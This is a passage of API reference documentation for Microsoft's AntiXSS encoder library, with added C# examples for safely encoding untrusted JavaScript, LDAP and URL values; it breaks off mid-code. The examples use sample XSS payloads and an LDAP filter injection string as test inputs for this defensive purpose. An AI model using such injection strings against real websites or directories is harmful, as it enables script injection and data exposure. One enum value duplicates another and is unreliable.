(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

Encoder.JavaScriptEncode Method (String)

Encodes input strings for use in JavaScript.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string JavaScriptEncode(
        string input
    )

Visual Basic

    Public Shared Function JavaScriptEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ JavaScriptEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in JavaScript.

Remarks

This function encodes all but known safe characters. Characters are encoded using \xSINGLE_BYTE_HEX and \uDOUBLE_BYTE_HEX notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    ,    Comma
    .    Period
    -    Dash
    _    Underscore
         Space
         Other international character ranges

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               'alert\x28\x27XSS Attack\x21\x27\x29\x3b'
    user@contoso.com                    'user\x40contoso.com'
    Anti-Cross Site Scripting Library   'Anti-Cross Site Scripting Library'

See Also

    Encoder Class
    JavaScriptEncode Overload
    Microsoft.Security.Application Namespace

Encoder.JavaScriptEncode Method (String, Boolean)

Encodes input strings for use in JavaScript.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string JavaScriptEncode(
        string input,
        bool emitQuotes
    )

Visual Basic

    Public Shared Function JavaScriptEncode ( _
        input As String, _
        emitQuotes As Boolean _
    ) As String

Visual C++

    public:
    static String^ JavaScriptEncode(
        String^ input,
        bool emitQuotes
    )

Parameters

input
    Type: System.String
    String to be encoded.
emitQuotes
    Type: System.Boolean
    Value indicating whether or not to emit quotes. true = emit quotes. false = no quotes.

Return Value

Encoded string for use in JavaScript. When emitQuotes is false the output is returned without surrounding quotes.

Remarks

This function encodes all but known safe characters. Characters are encoded using \xSINGLE_BYTE_HEX and \uDOUBLE_BYTE_HEX notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    ,    Comma
    .    Period
    -    Dash
    _    Underscore
         Space
         Other international character ranges

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               'alert\x28\x27XSS Attack\x21\x27\x29\x3b'
    user@contoso.com                    'user\x40contoso.com'
    Anti-Cross Site Scripting Library   'Anti-Cross Site Scripting Library'

See Also

    Encoder Class
    JavaScriptEncode Overload
    Microsoft.Security.Application Namespace
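The following is an added example, not code from the AntiXSS documentation or the library itself, showing how the two JavaScriptEncode overloads described above fit into an inline script block. It assumes a reference to AntiXssLibrary40.dll (namespace Microsoft.Security.Application); the variable names and the sample input are constructed for the example.

```csharp
// Added example, not part of the AntiXSS documentation: embedding untrusted text
// in an inline script block with the two JavaScriptEncode overloads.
// Assumes a reference to AntiXssLibrary40.dll (namespace Microsoft.Security.Application).
using System;
using Microsoft.Security.Application;

static class JavaScriptEncodeExample
{
    // Constructed sample input: a display name chosen to break out of a string literal.
    const string UntrustedName = "x'); alert('XSS Attack!'); ('";

    // JavaScriptEncode(String) returns the value already wrapped in single quotes,
    // so the caller must not add quotes of its own.
    public static string BuildAssignment(string untrusted)
    {
        return "var displayName = " + Encoder.JavaScriptEncode(untrusted) + ";";
    }

    // JavaScriptEncode(String, Boolean) with emitQuotes = false returns the bare
    // encoded text, which is the form to use when it is concatenated into a
    // literal that the template already quotes.
    public static string BuildGreeting(string untrusted)
    {
        return "var greeting = 'Hello, " + Encoder.JavaScriptEncode(untrusted, false) + "';";
    }

    // Emits the assignment inside a script element. '<' and '/' are outside the
    // encoder's safe list, so they come out as \x.. sequences and the browser's HTML
    // parser cannot see a premature "</script>" inside the data.
    public static string BuildScriptElement(string untrusted)
    {
        return "<script type=\"text/javascript\">" + BuildAssignment(untrusted) + "</script>";
    }

    static void Main()
    {
        Console.WriteLine(BuildAssignment(UntrustedName));
        Console.WriteLine(BuildGreeting(UntrustedName));
        Console.WriteLine(BuildScriptElement("</script><script>alert('XSS Attack!')</script>"));
    }
}
```

The quoting rule is the part that goes wrong most often: with the single-argument overload the quotes are part of the return value, so writing `'` + JavaScriptEncode(x) + `'` in a template produces doubled quotes and a syntax error, while using the emitQuotes = false form without supplying quotes leaves the data unquoted.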

Encoder.LdapDistinguishedNameEncode Method

Overload List

    Name                                                    Description
    LdapDistinguishedNameEncode(String)                     Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) DNs.
    LdapDistinguishedNameEncode(String, Boolean, Boolean)   Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) DNs.

See Also

    Encoder Class
    Encoder Members
    Microsoft.Security.Application Namespace

Encoder.LdapDistinguishedNameEncode Method (String)

Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) DNs.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string LdapDistinguishedNameEncode(
        string input
    )

Visual Basic

    Public Shared Function LdapDistinguishedNameEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ LdapDistinguishedNameEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use as a value in LDAP DNs.

Remarks

This method encodes all but known safe characters defined in the safe list. RFC 2253 defines the format in which special characters need to be escaped to be used inside a distinguished name. Special characters need to be encoded in #XX format, where XX is the hex representation of the character, or in a specific \ escape format. The following examples illustrate the use of the escaping mechanism (quotes delimit the values and are not part of them):

    Input         Encoded output
    ",+\"\<>"     "\,\+\"\\\<\>"
    " hello"      "\ hello"
    "hello "      "hello\ "
    "#hello"      "\#hello"
    "Lučić"       "Lu#C4#8Di#C4#87"

See Also

    Encoder Class
    LdapDistinguishedNameEncode Overload
    Microsoft.Security.Application Namespace

Encoder.LdapDistinguishedNameEncode Method (String, Boolean, Boolean)

Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) DNs.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string LdapDistinguishedNameEncode(
        string input,
        bool useInitialCharacterRules,
        bool useFinalCharacterRule
    )

Visual Basic

    Public Shared Function LdapDistinguishedNameEncode ( _
        input As String, _
        useInitialCharacterRules As Boolean, _
        useFinalCharacterRule As Boolean _
    ) As String

Visual C++

    public:
    static String^ LdapDistinguishedNameEncode(
        String^ input,
        bool useInitialCharacterRules,
        bool useFinalCharacterRule
    )

Parameters

input
    Type: System.String
    String to be encoded.
useInitialCharacterRules
    Type: System.Boolean
    Value indicating whether the special-case rules for encoding of spaces and octothorpes at the start of a string are used.
useFinalCharacterRule
    Type: System.Boolean
    Value indicating whether the special case for encoding of a final space character is used.

Return Value

Encoded string for use as a value in LDAP DNs.

Remarks

This method encodes all but known safe characters defined in the safe list. RFC 2253 defines the format in which special characters need to be escaped to be used inside a distinguished name. Special characters need to be encoded in #XX format, where XX is the hex representation of the character, or in a specific \ escape format. The following examples illustrate the use of the escaping mechanism (quotes delimit the values and are not part of them):

    Input         Encoded output
    ",+\"\<>"     "\,\+\"\\\<\>"
    " hello"      "\ hello"
    "hello "      "hello\ "
    "#hello"      "\#hello"
    "Lučić"       "Lu#C4#8Di#C4#87"

If useInitialCharacterRules is set to false then escaping of the initial space or octothorpe characters is not performed:

    Input         Encoded output
    ",+\"\<>"     "\,\+\"\\\<\>"
    " hello"      " hello"
    "hello "      "hello\ "
    "#hello"      "#hello"
    "Lučić"       "Lu#C4#8Di#C4#87"

If useFinalCharacterRule is set to false then escaping of a space at the end of a string is not performed:

    Input         Encoded output
    ",+\"\<>"     "\,\+\"\\\<\>"
    " hello"      " hello"
    "hello "      "hello "
    "#hello"      "#hello"
    "Lučić"       "Lu#C4#8Di#C4#87"

See Also

    Encoder Class
    LdapDistinguishedNameEncode Overload
    Microsoft.Security.Application Namespace

Encoder.LdapEncode Method

Encodes input strings to be used as a value in Lightweight Directory Access Protocol (LDAP) search queries.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    [ObsoleteAttribute("This method has been deprecated. Please use Encoder.LdapFilterEncode() instead.")]
    public static string LdapEncode(
        string input
    )

Visual Basic

    <ObsoleteAttribute("This method has been deprecated. Please use Encoder.LdapFilterEncode() instead.")> _
    Public Shared Function LdapEncode ( _
        input As String _
    ) As String

Visual C++

    [ObsoleteAttribute(L"This method has been deprecated. Please use Encoder.LdapFilterEncode() instead.")]
    public:
    static String^ LdapEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in LDAP search queries.

Remarks

This method encodes all but known safe characters defined in the safe list. RFC 4515 defines the format in which special characters need to be escaped to be used inside a search filter. Special characters need to be encoded in \XX format, where XX is the hex representation of the character. The following examples illustrate the use of the escaping mechanism:

    Input                                            Encoded output
    Parens R Us (for all your parenthetical needs)   Parens R Us \28for all your parenthetical needs\29
    *                                                \2A
    C:\MyFile                                        C:\5CMyFile
    NULL NULL NULL EOT (binary)                      \00\00\00\04
    Lučić                                            Lu\C4\8Di\C4\87

See Also

    Encoder Class
    Microsoft.Security.Application Namespace

Encoder.LdapFilterEncode Method

Encodes input strings for use as a value in Lightweight Directory Access Protocol (LDAP) filter queries.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string LdapFilterEncode(
        string input
    )

Visual Basic

    Public Shared Function LdapFilterEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ LdapFilterEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use as a value in LDAP filter queries.

Remarks

This method encodes all but known safe characters defined in the safe list. RFC 4515 defines the format in which special characters need to be escaped to be used inside a search filter. Special characters need to be encoded in \XX format, where XX is the hex representation of the character. The following examples illustrate the use of the escaping mechanism:

    Input                                            Encoded output
    Parens R Us (for all your parenthetical needs)   Parens R Us \28for all your parenthetical needs\29
    *                                                \2A
    C:\MyFile                                        C:\5CMyFile
    NULL NULL NULL EOT (binary)                      \00\00\00\04
    Lučić                                            Lu\C4\8Di\C4\87

See Also

    Encoder Class
    Microsoft.Security.Application Namespace
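The following is an added example, not code from the AntiXSS documentation or the library, that puts the two LDAP encoders described on the preceding pages side by side: LdapFilterEncode for a value inside a search filter (the replacement for the deprecated LdapEncode) and LdapDistinguishedNameEncode for a component of a DN. It assumes a reference to AntiXssLibrary40.dll; the directory root "DC=contoso,DC=com", the OU, the attribute names and the sample inputs are constructed for the example.

```csharp
// Added example, not part of the AntiXSS documentation: LdapFilterEncode for a
// search-filter value and LdapDistinguishedNameEncode for a DN component.
// Assumes AntiXssLibrary40.dll; "DC=contoso,DC=com" and "OU=Staff" are placeholders.
using System;
using Microsoft.Security.Application;

static class LdapEncodeExample
{
    // Constructed sample inputs.
    const string UntrustedLogin = "*)(objectClass=*";   // tries to widen the filter
    const string UntrustedName  = " Smith, John #1 ";   // DN-special characters and edge spaces

    // Filter values take RFC 4515 escaping: LdapFilterEncode turns '*', '(' and ')'
    // into \2A, \28 and \29, so the wildcard and the extra clause stay literal text
    // and the filter keeps the structure the template gave it.
    public static string BuildFilter(string login)
    {
        return "(&(objectClass=user)(sAMAccountName=" + Encoder.LdapFilterEncode(login) + "))";
    }

    // DN components take RFC 2253 escaping. With the single-argument overload the
    // default rules apply: ',' becomes '\,', a leading space or '#' and a trailing
    // space are escaped, and non-ASCII characters become #XX byte pairs. A comma that
    // is not escaped would otherwise end the RDN and start a new one.
    public static string BuildDn(string commonName)
    {
        return "CN=" + Encoder.LdapDistinguishedNameEncode(commonName) + ",OU=Staff,DC=contoso,DC=com";
    }

    static void Main()
    {
        Console.WriteLine(BuildFilter(UntrustedLogin));
        Console.WriteLine(BuildDn(UntrustedName));
    }
}
```

The two encoders are not interchangeable: a filter value escaped with the DN rules, or a DN component escaped with \XX filter escaping, is either rejected by the server or parsed with a different meaning than intended. Keep the default initial and final character rules of LdapDistinguishedNameEncode unless the value is guaranteed not to start with a space or '#' or end with a space.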

Encoder.UrlEncode Method

Overload List

    Name                        Description
    UrlEncode(String)           Encodes input strings for use in universal resource locators (URLs).
    UrlEncode(String, Int32)    Encodes input strings for use in universal resource locators (URLs).
    UrlEncode(String, Encoding) Encodes input strings for use in universal resource locators (URLs).

See Also

    Encoder Class
    Encoder Members
    Microsoft.Security.Application Namespace

Encoder.UrlEncode Method (String)

Encodes input strings for use in universal resource locators (URLs).

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string UrlEncode(
        string input
    )

Visual Basic

    Public Shared Function UrlEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ UrlEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in URLs.

Remarks

This function encodes all but known safe characters. Characters are encoded using %SINGLE_BYTE_HEX and %DOUBLE_BYTE_HEX notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    .    Period
    -    Dash
    _    Underscore
    ~    Tilde

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               alert%28%27XSS%20Attack%21%27%29%3b
    user@contoso.com                    user%40contoso.com
    Anti-Cross Site Scripting Library   Anti-Cross%20Site%20Scripting%20Library

See Also

    Encoder Class
    UrlEncode Overload
    Microsoft.Security.Application Namespace

Encoder.UrlEncode Method (String, Int32)

Encodes input strings for use in universal resource locators (URLs).

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Return Value

Encoded string for use in URLs.

Remarks

This function encodes the output as per the encoding parameter (code page) passed to it. It encodes all but known safe characters. Characters are encoded using %SINGLE_BYTE_HEX and %DOUBLE_BYTE_HEX notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    .    Period
    -    Dash
    _    Underscore
    ~    Tilde

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               alert%28%27XSS%82%a0Attack%21%27%29%3b
    user@contoso.com                    user%40contoso.com
    Anti-Cross Site Scripting Library   Anti-Cross%20Site%20Scripting%20Library

See Also

    Encoder Class
    UrlEncode Overload
    Microsoft.Security.Application Namespace

Encoder.UrlEncode Method (String, Encoding)

Encodes input strings for use in universal resource locators (URLs).

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string UrlEncode(
        string input,
        Encoding inputEncoding
    )

Visual Basic

    Public Shared Function UrlEncode ( _
        input As String, _
        inputEncoding As Encoding _
    ) As String

Visual C++

    public:
    static String^ UrlEncode(
        String^ input,
        Encoding^ inputEncoding
    )

Parameters

input
    Type: System.String
    String to be encoded.
inputEncoding
    Type: System.Text.Encoding
    Input encoding type.

Return Value

Encoded string for use in URLs.

Remarks

This function encodes the output as per the encoding parameter (code page) passed to it. It encodes all but known safe characters. Characters are encoded using %SINGLE_BYTE_HEX and %DOUBLE_BYTE_HEX notation. If the inputEncoding is null then UTF-8 is assumed by default. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    .    Period
    -    Dash
    _    Underscore
    ~    Tilde

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               alert%28%27XSS%82%a0Attack%21%27%29%3b
    user@contoso.com                    user%40contoso.com
    Anti-Cross Site Scripting Library   Anti-Cross%20Site%20Scripting%20Library

See Also

    Encoder Class
    UrlEncode Overload
    Microsoft.Security.Application Namespace

Encoder.UrlPathEncode Method

URL-encodes the path section of a URL string and returns the encoded string.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string UrlPathEncode(
        string input
    )

Visual Basic

    Public Shared Function UrlPathEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ UrlPathEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    The text to URL path encode.

Return Value

The URL path encoded text.

See Also

    Encoder Class
    Microsoft.Security.Application Namespace
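The following is an added example, not code from the AntiXSS documentation or the library, that uses the URL encoders from the preceding pages (HtmlFormUrlEncode, UrlEncode in its String and Encoding forms, and UrlPathEncode) on the parts of a URL each one is meant for. It assumes a reference to AntiXssLibrary40.dll; the "/docs/" prefix, the query parameter name "q" and the sample values are constructed for the example.

```csharp
// Added example, not part of the AntiXSS documentation: one encoder per URL part.
// Assumes AntiXssLibrary40.dll; "/docs/" and the parameter name "q" are placeholders.
using System;
using System.Text;
using Microsoft.Security.Application;

static class UrlEncodeExample
{
    // Constructed sample values.
    const string Folder = "Anti-Cross Site Scripting Library";
    const string Search = "alert('XSS Attack!');";

    // Path section: UrlPathEncode is the encoder the documentation gives for the path.
    // Here a single segment is encoded and the '/' separators come from the template.
    // Query value: UrlEncode, which emits %20 for spaces and %XX for the other
    // characters outside its safe list (letters, digits, '.', '-', '_', '~').
    public static string BuildLink(string folder, string search)
    {
        return "/docs/" + Encoder.UrlPathEncode(folder) + "?q=" + Encoder.UrlEncode(search);
    }

    // application/x-www-form-urlencoded body: HtmlFormUrlEncode emits '+' for spaces,
    // which is what a form POST expects; UrlEncode would emit %20 there.
    public static string BuildFormBody(string search)
    {
        return "q=" + Encoder.HtmlFormUrlEncode(search);
    }

    // The Encoding overload lets a legacy code page decide the %XX bytes of non-ASCII
    // text. Passing null falls back to UTF-8, the documented default.
    public static string BuildQueryWithCodePage(string search, Encoding codePage)
    {
        return "q=" + Encoder.UrlEncode(search, codePage);
    }

    static void Main()
    {
        Console.WriteLine(BuildLink(Folder, Search));
        Console.WriteLine(BuildFormBody(Folder));
        // Windows-1250 covers Central European letters such as č and ć.
        Console.WriteLine(BuildQueryWithCodePage("Lučić", Encoding.GetEncoding(1250)));
        Console.WriteLine(BuildQueryWithCodePage("Lučić", null));
    }
}
```

The encoding is applied to each untrusted value before it is concatenated into the URL, never to the finished URL, so that the '/', '?', '=' and '&' that the template contributes stay structural and the ones an attacker supplies become data.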

Encoder.VisualBasicScriptEncode Method

Encodes input strings for use in Visual Basic Script.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string VisualBasicScriptEncode(
        string input
    )

Visual Basic

    Public Shared Function VisualBasicScriptEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ VisualBasicScriptEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in Visual Basic Script.

Remarks

This function encodes all but known safe characters. Characters are encoded using &chrw(DECIMAL) notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    ,    Comma
    .    Period
    -    Dash
    _    Underscore
         Space

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               "alert"&chrw(40)&chrw(39)&"XSS Attack"&chrw(33)&chrw(39)&chrw(41)&chrw(59)
    user@contoso.com                    "user"&chrw(64)&"contoso.com"
    Anti-Cross Site Scripting Library   "Anti-Cross Site Scripting Library"

See Also

    Encoder Class
    Microsoft.Security.Application Namespace

Encoder.XmlAttributeEncode Method

Encodes input strings for use in XML attributes.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string XmlAttributeEncode(
        string input
    )

Visual Basic

    Public Shared Function XmlAttributeEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ XmlAttributeEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in XML attributes.

Remarks

This function encodes all but known safe characters. Characters are encoded using &#DECIMAL; notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    ,    Comma
    .    Period
    -    Dash
    _    Underscore

The safe list may be adjusted using MarkAsSafe(LowerCodeCharts, LowerMidCodeCharts, MidCodeCharts, UpperMidCodeCharts, UpperCodeCharts).

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               alert(&apos;XSS Attack!&apos;);
    user@contoso.com                    user@contoso.com
    Anti-Cross Site Scripting Library   Anti-Cross&#32;Site&#32;Scripting&#32;Library

See Also

    Encoder Class
    Microsoft.Security.Application Namespace

Encoder.XmlEncode Method

Encodes input strings for use in XML.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    public static string XmlEncode(
        string input
    )

Visual Basic

    Public Shared Function XmlEncode ( _
        input As String _
    ) As String

Visual C++

    public:
    static String^ XmlEncode(
        String^ input
    )

Parameters

input
    Type: System.String
    String to be encoded.

Return Value

Encoded string for use in XML.

Remarks

This function encodes all but known safe characters. Characters are encoded using &#DECIMAL; notation. Safe characters include:

    a-z  Lowercase alphabet
    A-Z  Uppercase alphabet
    0-9  Numbers
    ,    Comma
    .    Period
    -    Dash
    _    Underscore
         Space

The safe list may be adjusted using MarkAsSafe(LowerCodeCharts, LowerMidCodeCharts, MidCodeCharts, UpperMidCodeCharts, UpperCodeCharts).

Example inputs and encoded outputs:

    Input                               Encoded output
    alert('XSS Attack!');               alert(&apos;XSS Attack!&apos;);
    user@contoso.com                    user@contoso.com
    Anti-Cross Site Scripting Library   Anti-Cross Site Scripting Library

See Also

    Encoder Class
    Microsoft.Security.Application Namespace

LowerCodeCharts Enumeration

Values for the lowest section of the UTF-8 Unicode code tables, from U+0000 to U+0FFF.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    [FlagsAttribute]
    public enum LowerCodeCharts

Visual Basic

    <FlagsAttribute> _
    Public Enumeration LowerCodeCharts

Visual C++

    [FlagsAttribute]
    public enum class LowerCodeCharts

Members

    Member name                       Value         Description
    None                              0             No code charts from the lower region of the Unicode tables are safe-listed.
    BasicLatin                        1             The Basic Latin code table.
    C1ControlsAndLatin1Supplement     2             The C1 Controls and Latin-1 Supplement code table.
    LatinExtendedA                    4             The Latin Extended-A code table.
    LatinExtendedB                    8             The Latin Extended-B code table.
    IpaExtensions                     16            The IPA Extensions code table.
    SpacingModifierLetters            32            The Spacing Modifier Letters code table.
    CombiningDiacriticalMarks         64            The Combining Diacritical Marks code table.
    GreekAndCoptic                    128           The Greek and Coptic code table.
    Cyrillic                          256           The Cyrillic code table.
    CyrillicSupplement                512           The Cyrillic Supplement code table.
    Armenian                          1024          The Armenian code table.
    Hebrew                            2048          The Hebrew code table.
    Arabic                            4096          The Arabic code table.
    Syriac                            8192          The Syriac code table.
    ArabicSupplement                  16384         The Arabic Supplement code table.
    Thaana                            32768         The Thaana code table.
    Nko                               65536         The Nko code table.
    Samaritan                         131072        The Samaritan code table.
    Devanagari                        262144        The Devanagari code table.
    Bengali                           524288        The Bengali code table.
    Gurmukhi                          1048576       The Gurmukhi code table.
    Gujarati                          2097152       The Gujarati code table.
    Oriya                             4194304       The Oriya code table.
    Tamil                             8388608       The Tamil code table.
    Telugu                            16777216      The Telugu code table.
    Kannada                           33554432      The Kannada code table.
    Malayalam                         67108864      The Malayalam code table.
    Sinhala                           134217728     The Sinhala code table.
    Thai                              268435456     The Thai code table.
    Lao                               536870912     The Lao code table.
    Tibetan                           1073741824    The Tibetan code table.
    Default                           127           The default code tables marked as safe on initialisation.

See Also

    Microsoft.Security.Application Namespace

LowerMidCodeCharts Enumeration

Values for the lower-mid section of the UTF-8 Unicode code tables, from U+1000 to U+1EFF.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    [FlagsAttribute]
    public enum LowerMidCodeCharts

Visual Basic

    <FlagsAttribute> _
    Public Enumeration LowerMidCodeCharts

Visual C++

    [FlagsAttribute]
    public enum class LowerMidCodeCharts

Members

    Member name                                  Value         Description
    None                                         0             No code charts from the lower-mid region of the Unicode tables are safe-listed.
    Myanmar                                      1             The Myanmar code table.
    Georgian                                     2             The Georgian code table.
    HangulJamo                                   4             The Hangul Jamo code table.
    Ethiopic                                     8             The Ethiopic code table.
    EthiopicSupplement                           16            The Ethiopic Supplement code table.
    Cherokee                                     32            The Cherokee code table.
    UnifiedCanadianAboriginalSyllabics           64            The Unified Canadian Aboriginal Syllabics code table.
    Ogham                                        128           The Ogham code table.
    Runic                                        256           The Runic code table.
    Tagalog                                      512           The Tagalog code table.
    Hanunoo                                      1024          The Hanunoo code table.
    Buhid                                        2048          The Buhid code table.
    Tagbanwa                                     4096          The Tagbanwa code table.
    Khmer                                        8192          The Khmer code table.
    Mongolian                                    16384         The Mongolian code table.
    UnifiedCanadianAboriginalSyllabicsExtended   32768         The Unified Canadian Aboriginal Syllabics Extended code table.
    Limbu                                        65536         The Limbu code table.
    TaiLe                                        131072        The Tai Le code table.
    NewTaiLue                                    262144        The New Tai Lue code table.
    KhmerSymbols                                 524288        The Khmer Symbols code table.
    Buginese                                     1048576       The Buginese code table.
    TaiTham                                      2097152       The Tai Tham code table.
    Balinese                                     4194304       The Balinese code table.
    Sudanese                                     8388608       The Sudanese code table.
    Lepcha                                       16777216      The Lepcha code table.
    OlChiki                                      33554432      The Ol Chiki code table.
    VedicExtensions                              67108864      The Vedic Extensions code table.
    PhoneticExtensions                           134217728     The Phonetic Extensions code table.
    PhoneticExtensionsSupplement                 268435456     The Phonetic Extensions Supplement code table.
    CombiningDiacriticalMarksSupplement          536870912     The Combining Diacritical Marks Supplement code table.
    LatinExtendedAdditional                      1073741824    The Latin Extended Additional code table.

See Also

    Microsoft.Security.Application Namespace

MidCodeCharts Enumeration

Values for the middle section of the UTF-8 Unicode code tables, from U+1F00 to U+2DDF.

Namespace: Microsoft.Security.Application
Assembly: AntiXssLibrary40 (in AntiXssLibrary40.dll)
Version: 4.2.0.0

Syntax

C#

    [FlagsAttribute]
    public enum MidCodeCharts

Visual Basic

    <FlagsAttribute> _
    Public Enumeration MidCodeCharts

Visual C++

    [FlagsAttribute]
    public enum class MidCodeCharts

Members

    Member name                             Value         Description
    None                                    0             No code charts from the lower region of the Unicode tables are safe-listed.
    GreekExtended                           1             The Greek Extended code table.
    GeneralPunctuation                      2             The General Punctuation code table.
    SuperscriptsAndSubscripts               4             The Superscripts and Subscripts code table.
    CurrencySymbols                         8             The Currency Symbols code table.
    CombiningDiacriticalMarksForSymbols     16            The Combining Diacritical Marks for Symbols code table.
    LetterlikeSymbols                       32            The Letterlike Symbols code table.
    NumberForms                             64            The Number Forms code table.
    Arrows                                  128           The Arrows code table.
    MathematicalOperators                   256           The Mathematical Operators code table.
    MiscellaneousTechnical                  512           The Miscellaneous Technical code table.
    ControlPictures                         1024          The Control Pictures code table.
    OpticalCharacterRecognition             2048          The Optical Character Recognition table.
    EnclosedAlphanumerics                   4096          The Enclosed Alphanumeric code table.
    BoxDrawing                              8192          The Box Drawing code table.
    BlockElements                           16384         The Block Elements code table.
    GeometricShapes                         32768         The Geometric Shapes code table.
    MiscellaneousSymbols                    65536         The Miscellaneous Symbols code table.
    Dingbats                                131072        The Dingbats code table.
    MiscellaneousMathematicalSymbolsA       262144        The Miscellaneous Mathematical Symbols-A code table.
    SupplementalArrowsA                     524288        The Supplemental Arrows-A code table.
    BraillePatterns                         1048576       The Braille Patterns code table.
    SupplementalArrowsB                     2097152       The Supplemental Arrows-B code table.
    MiscellaneousMathematicalSymbolsB       4194304       The Miscellaneous Mathematical Symbols-B code table.
    SupplementalMathematicalOperators       8388608       The Supplemental Mathematical Operators code table.
    MiscellaneousSymbolsAndArrows           16777216      The Miscellaneous Symbols and Arrows code table.
    Glagolitic                              33554432      The Glagolitic code table.
    LatinExtendedC                          67108864      The Latin Extended-C code table.
    Coptic                                  134217728     The Coptic code table.
    GeorgianSupplement                      268435456     The Georgian Supplement code table.
    Tifinagh                                536870912     The Tifinagh code table.
    EthiopicExtended                        16384         The Ethiopic Extended code table.

See Also

    Microsoft.Security.Application Namespace
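The following is an added example, not code from the AntiXSS documentation or the library, that ties the XmlEncode and XmlAttributeEncode pages to the code chart enumerations above: the remarks on those pages say the safe list may be adjusted with MarkAsSafe, and the enumerations are the flags it takes. It assumes a reference to AntiXssLibrary40.dll; the UpperMidCodeCharts and UpperCodeCharts enumerations, which are not shown on this page, are passed their None value, and the sample input and element names are constructed for the example.

```csharp
// Added example, not part of the AntiXSS documentation: widening the encoder safe
// list with MarkAsSafe so Greek and Cyrillic letters are emitted literally while
// markup characters keep being encoded. Assumes AntiXssLibrary40.dll; the
// UpperMidCodeCharts/UpperCodeCharts None values are assumed from those enumerations.
using System;
using Microsoft.Security.Application;

static class SafeListExample
{
    // Constructed sample: a display name mixing Greek, Cyrillic and injected markup.
    const string Untrusted = "Ελλάδα <b onclick=\"x()\">Россия</b>";

    public static string BuildElement(string text)
    {
        return "<note>" + Encoder.XmlEncode(text) + "</note>";
    }

    public static string BuildAttribute(string text)
    {
        return "<note title=\"" + Encoder.XmlAttributeEncode(text) + "\"/>";
    }

    // The safe list belongs to the static Encoder class and so applies to every
    // caller in the process: set it once at application start, not per request.
    // LowerCodeCharts.Default (value 127) keeps the seven charts that are safe on
    // initialisation; the Greek and Cyrillic charts are added to them.
    public static void AllowGreekAndCyrillic()
    {
        Encoder.MarkAsSafe(
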